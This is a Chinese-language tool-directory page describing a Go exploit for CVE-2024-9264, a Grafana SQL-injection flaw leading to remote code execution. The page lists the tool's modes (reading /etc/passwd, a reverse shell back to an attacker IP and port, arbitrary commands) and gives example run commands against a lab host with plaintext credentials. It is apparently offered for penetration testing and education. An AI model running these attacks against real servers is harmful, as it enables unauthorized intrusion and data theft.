Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-9264 — CVE-2024-9264的Go实现,影响grafana 11.0.x、11.1.x和11.2.x版本。 | Kitploit
工具/GitHubGitHub/cythonic1/cve-2024-9264
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubcythonic1/cve-2024-9264

CVE-2024-9264

CVE-2024-9264的Go实现,影响grafana 11.0.x、11.1.x和11.2.x版本。

查看仓库
311年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
网站
分享

🚨 CVE-2024-9264 - Grafana SQL注入导致远程代码执行(RCE)和文件读取

针对CVE-2024-9264的利用工具,Grafana中的一个关键漏洞,允许认证的攻击者执行SQL查询导致RCE

🛡️ 此工具严格用于教育目的和授权的渗透测试。
未经授权的使用是非法且不道德的。


🧠 漏洞概述

🕳️ 什么是CVE-2024-9264?

CVE-2024-9264 是Grafana中的一个关键缺陷,允许认证的攻击者执行SQL命令,导致RCE和文件读取

🧬 根本原因

  • 不充分的清理。

💥 影响

  • RCE:执行任意命令,获取反弹shell,或读取敏感文件。
  • 高严重性:如果成功,可能完全控制服务器。

⚒️ 功能特性

  • 支持多种攻击模式:
    • file – 读取任意文件(例如/etc/passwd)
    • shell – 向攻击者机器反弹shell
    • command – 运行任意shell命令(例如whoami)
  • 可自定义攻击者IP、端口和凭据

🚀 使用方法

帮助菜单

并非所有参数都是必需的。

示例

获取shell

go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell

读取文件

go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd

执行单条命令

go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'

🔧 命令行标志

go run main.go [flags]

下载工具